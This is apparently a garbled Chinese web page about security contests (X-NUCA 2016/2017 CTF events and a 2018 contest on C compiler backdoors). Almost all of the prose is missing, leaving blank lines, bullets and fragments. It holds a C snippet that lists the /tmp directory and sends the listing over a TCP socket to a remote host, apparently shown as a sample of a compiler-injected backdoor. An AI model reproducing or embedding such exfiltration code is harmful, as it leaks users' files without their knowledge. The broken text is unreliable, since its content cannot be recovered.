
  
 



   

 

"" "" 

 

  

 
   















   

 




   




   



CTF
/ /  /  / 

 
 


 









 


 

 

 

 

Web



· CTF
· ""CTF Web



   

 

· "- ---"  
·   
·  

 

 











·  4·19
· 



· XcodeGhostXshellpython pip 
·  





  









 

  

   



2018"C"
· 2018· 
· C 318381115
· C

2018"C"

C 
183 C

 
·  
·   
·  hook
 +


 
· C · 
 · I/O

LLVM pass 


 
·  
C 

3581115

2018"C"

"/tmp"  

 

·  send 
· I/O   

int s; char buff[1024]; DIR *dir_path;

struct sockaddr_in sockaddin; struct dirent *path;

memset(buff, 0, sizeof(buff));

dir_path = opendir("/tmp");

if (dir_path) { while ((path = readdir(dir_path)) != NULL)



sprintf(buff, "%s\n%s", buff, path->d_name);

closedir(dir_path);

}

if ((s = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) goto Exit;

memset(&sockaddin, 0, sizeof(sockaddin));

............

if (connect(s,(struct sockaddr *) &sockaddin, sizeof(sockaddin)) < 0) goto Exit;

send(s, buff, sizeof(buff), 0);

close(s);

Exit;

+
 "-- --" "  " 



   

2017""
· 2017 · 50
30  · ""

2017""


** ** **









17 4 8

  

  

  

  

8×1255030

X-NUCA

2016"(National University Cybersecurity AssociationX-NUCA)""+" ""

 
 

  
 

 X-NUCA'2016
 ·

 
 

  
 360 

 X-NUCA'2017
 ·

2016X-NUCA'2016

(X-NUCA'2016)

+

20167

201612 



2017X-NUCA'2017

(X-NUCA'2017)
Windows 7 




826

108

1125

1219-22

Web 

 

X-NUCA'2017









 

 

 


    
 

X-NUCA'2017 
·   
·     
·   

X-NUCA'2017 

 

X-NUCA'2017 

  

  



  

PC 33 

  

Web  

   


X-NUCA'2017 

Web CMS 


  






  

AWD   

   


X-NUCA'2017
20 100 300

1 3 1

 


  

X-NUCA'2017 

X-NUCA'2017 


·  
·    
·  

 

